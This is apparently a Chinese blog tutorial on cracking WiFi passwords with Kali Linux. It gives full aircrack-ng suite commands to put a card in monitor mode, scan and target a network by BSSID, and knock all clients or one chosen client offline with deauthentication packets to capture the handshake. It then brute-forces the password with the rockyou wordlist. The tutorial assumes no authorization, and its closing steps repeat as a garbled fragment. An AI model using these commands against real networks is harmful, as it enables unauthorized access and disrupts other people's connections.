kali暴力破解WiFi密码实验步骤
建议在kali的root模式下进行
实验条件:
-
window7下的VMware装的kali 2020
-
某宝买的无线 网卡,注意,有些厂家的网卡不支持Linux系统,所以在买网卡时,最好先询问一下
-
在官网下载的驱动,解压之后直接运行
install.sh
,我在安装时,有报错误的,但是影响不大,我是直接关机重启虚拟机就好了,可直接查看iwconfig
,如果出现wlan0则表示,驱动安装成功 -
查看无线网卡
指令airmon-ng
2. 开启监听模式
命令 airmon-ng start wlan0
说明:有些开启监听模式时,查看iwconfig
,网卡名字wlan0
会变成wlan0mon
,我的电脑则不变,只要出现上述enable
说明已经开启,如若变成网卡名字变成wlan0mon
,以下操作将用wlan0mon
,视自己情况而定
如果监听不能打开,执行命令:airmon-ng check kill
,之后重新运行监听命令
-
扫描附近WiFi
命令:
airodump-ng wlan0
BSSID 是MAC地址
PWR 信号强度,越小越好 –
CH WiFi占用的通道号
ENC WiFi的加密方式wlan
ESSID表示WIFI名字
选取好目标WiFi,按下Ctrl+c
-
对目标WiFi的捕获
airodump-ng -c 1 --bssid B0:95:8E:16:A0:CF wlan0 -w 675 #格式 -c 选择通道号 --bssid WiFi的mac地址 wlan0网卡,捕获的带有密码的数据包存放名称 #或者 airodump-ng --bssid B0:95:8E:16:A0:CF -c 1 wlan0 -w 675
- 断网获取带有密码的数据包
当查看到有客户连接到目标WiFi,我们是没法获带有密码的数据包,需要将该WiFi下的设备进行踢下线(也可将某一个设备进行踢下线),设备断网之后会重新登录,可以自动捕获到带有密码的数据包
新开一个终端,输入如下命令
aireplay-ng -0 10 -a B0:95:8E:16:A0:CF wlan0 #将所有用户踢下线
aireplay-ng -0 10 -a B0:95:8E:16:A0:CF -c (某设备的mac地址) wlan0 #踢出某个用户设备
在捕获WiFi终端中,会出现以下信息代表信息捕捉到
此时,使用命令:ls
上图箭头指向是我们需要的数据包,*.cap格式。使用最近的一次数据包
-
爆破密码
打开主文件夹,新建文件夹WiFi,将675-03.cap以及密码字典复制到WiFi文件夹
在WiFi文件夹下打开终端
aircrack-ng -w 1pass01.txt 675-03.cap
kali自带一个字典库
#rockyou需要进行解压,位于/usr/share/wordlists/
#解压命令如下
gzip -d /usr/share/wordlists/rockyou.txt.gz
#爆破命令
aircrack-ng -w /usr/share/wordlists/rockyou.txt 675-03.cap
之后就是漫长的等待,流程是这样,
附带命令:
#停止监听命令
airmon-ng stop wlan0
ckyou.txt 675-03.cap
之后就是漫长的等待,流程是这样,
附带命令:
```powershell
#停止监听命令
airmon-ng stop wlan0
后附密码字典,需要自收
https://download.csdn.net/download/qq_45435398/16490945
密码字典 https://download.csdn.net/download/qq_45435398/16490945